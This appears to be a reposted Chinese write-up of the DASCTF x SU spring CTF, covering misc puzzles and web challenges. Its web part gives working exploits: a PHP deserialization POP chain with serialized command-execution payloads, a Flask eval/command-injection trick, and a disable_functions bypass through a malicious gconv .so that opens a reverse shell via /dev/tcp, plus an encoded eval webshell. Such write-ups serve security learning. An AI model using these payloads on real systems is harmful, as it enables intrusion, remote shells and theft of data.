开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> DASCTF x SU 春季挑战赛 -> 正文阅读

[PHP知识库]DASCTF x SU 春季挑战赛

0x01 MISC

月圆之夜

这个直接B站上就行，有专门的破视频
在这里插入图片描述

题目：
在这里插入图片描述
DASCTF{welcometothefullmoonnight}

什么奇奇怪怪的东西

打开发现有MRF文件，键盘鼠标记录器，使用Macro Recorder软件打开，flag压缩包是干扰文件，直接不理。

在这里插入图片描述

在这里插入图片描述
这个软件不会用…
套神给的密码

然后解压flag.zip即可，发现有一个挂载的文件，直接打开后显示所有的隐藏文件

一个一个打开然后进行拼接运行吧估计。
首先打开txt文件直接久就给出了代码；
继续查看flag2.pptx文件也是直接给出了代码；
看3.xlsx 使用文本打开发现是一个压缩包修改后缀后解压打开在/xl/sharedStrings.xml中；
在第四个图片中打开后发现有一个虚假的flag，使用010打开该图片文件尾有而外的数据，是png文件的倒置。
在这里插入图片描述

f = open('ZmxhZzQK.png','rb').read()
f1 = open('flag.png','w')
flag = ''
for i in f:
    flag += str(hex(i)[2:].zfill(2))
flag = flag[::-1]
f1.write(flag)

在线运行：运行网站

0x02 WEB

ezpop

一道简单的POP链构造，直接看链子的结尾和链子的入口，根据魔法方法进行构造。
然后这里值得一提就是在get_flag()函数中使用了#进行注释，我们只需要使用换行即可绕过这里达到命令执行的效果。

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()//4. new fin();调用call函数
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()//1.链子入口
    {
        echo $this->f1 . '114514';//  = new what();类当字符串使用调用toString
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();//5.获取flag
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();//2. = new  mix();调用run方法
        return 'hello';
    }
}

class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();//3.把对象当作函数使用调用invoke函数
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

EXP:

<?php
class crow
{
    public $v1;
    public $v2;
    public function __construct($v1)
    {
        $this->v1 = $v1;
    }
}

class fin
{
    public $f1;
    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;
    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public $m1;
    public function __construct($m1)
    {
        $this->m1 = $m1;
    }
}

$Fin = new mix("%0a;system('tac f*');");
$Crow = new fin($Fin);
$Mix  = new crow($Crow);
$What = new mix($Mix);
$Fin2  = new what($What);
$a = new fin($Fin2);

echo serialize($a);
//O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:17:"%0a;system('ls');";}}s:2:"v2";N;}}}}

实际出来的时候 %0a会被解析为\n少一个字符所以长度要减1

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:16:"%0a;system('ls');";}}s:2:"v2";N;}}}}

//cat H*

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:20:"%0a;system('cat H*');";}}s:2:"v2";N;}}}}

在这里插入图片描述

calc

题目源码：

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

分析：这里我们关注传入的num中有一个eval执行，开始考虑到使用这里的方法继续宁RCE但后来测试发现过滤的内容有点多，难以绕过。只能考虑使用os.system(log)来执行命令，那么这里要怎么做才能执行到命令呢？毕竟log是一个文本文件。

想执行系统命令就必须要经过python的eval执行，如果输入了别的字符就会导致这个函数报错。
在这里插入图片描述

这里考虑到使用Python中的注释符号#，这个符号可以注释掉python之后的内容，进而使python命令执行不报错。那么我们接下来看看linux中会是什么效果。
在这里插入图片描述

使用通配符外带出数据。（flag 可以使用*f*、*l*、*a*、*g*、*1*进行匹配）
在这里插入图片描述

在这里插入图片描述

upgdstore

只给一个文件上传页面，直接上传php文件但是好像对eval关键字做出了过滤所以先传入一个phpinfo()看看。
在这里插入图片描述

disable_function中的内容很多。
在这里插入图片描述
但是这里被过滤的很多，又show_source和file_get_contents没有被过滤
这里尝试读取一下源码：

<?php
('sho'.'w_source')("/var/www/html/index.php");//这里拼接绕过是因为这个函数是被放了黑名单里了
?>

或base64_decode("c2hvd19zb3VyY2U=")("/var/www/html/index.php");

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计，传个火？！
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }

    
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶，被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

接下来的思路就是绕过disable_function进行，常见的思路就是编译产生一个.so进行绕过。
参考：使用GCONV_PATH与iconv进行bypass disable_functions
BYPASS过程：
在某一文件夹（一般是/tmp）中上传gconv-modules文件，文件中指定我们自定义的字符集文件的.so，然后我们再在.so文件中的gonv_init()函数中书写命令执行函数，之后上传php的shell，内容是使用php设定GCONV_PATH指向我们的gconv-modules文件，然后使用iconv函数使我们的恶意代码执行。

第一步先要我们上传gconv-modules 文件，该文件格式如下：

module 自定义字符集名字（大写）// INTERNAL …/…/…/…/…/…/…/…/tmp/自定义字符集名字（小写） 2
module INTERNAL 自定义字符集名字（大写）// …/…/…/…/…/…/…/…/tmp/自定义字符集名字（小写） 2

所以我们写成：

module MOHE// INTERNAL …/…/…/…/…/…/…/…/tmp/mohe 2
module INTERNAL MOHE// …/…/…/…/…/…/…/…/tmp/mohe 2

第二步上传.so文件，c语言源代码如下：

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("希望执行的命令");
}

我们写成：

#include <stdio.h>
#include <stdlib.h>
void gconv() {}
void gconv_init() {
  system("bash -c 'exec bash -i >& /dev/tcp/ip/port 0>&1'");//首选反弹shell
}

编译语句（编译为so文件）：

gcc 源代码文件名.c -o 自定义字符集名.so -shared -fPIC

前面我们自定义字符定义为mohe所以这里的编译语句为：

gcc mohe.c -o mohe.so -shared -fPIC

第三步上传shell.php

<?php
    putenv("GCONV_PATH=/tmp/");
    iconv("自定义字符集名", "UTF-8", "whatever");
?>

这个shell.php上传之后就可以直接访问了，在这道题中我们再最后上传一个webshell，然后进行文件的包含也可以达到相同的目的。

<?php base64_decode("PD9ldmFsKCRfUE9TVFttb2hlXSk7Pz4=");?>

最后的payload:

mohe=putenv("GCONV_PATH=/tmp/");include('php://filter/read=convert.iconv.mohe.utf-8/resource=/tmp/mohe.so')

反弹出shell。

PHP知识库最新文章

Laravel 下实现 Google 2fa 验证

UUCTF WP

DASCTF10月 web

XAMPP任意命令执行提升权限漏洞（CVE-2020-

[GYCTF2020]Easyphp

iwebsec靶场代码执行关卡通关笔记

多个线程同步执行，多个线程依次执行，多个

php 没事记录下常用方法 (TP5.1)

php之jwt

2021-09-18

加:2022-04-06 15:58:20 更:2022-04-06 15:58:22

360图书馆购物三丰科技阅读网日历万年历 2024年5日历

-2024/5/18 19:47:12-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码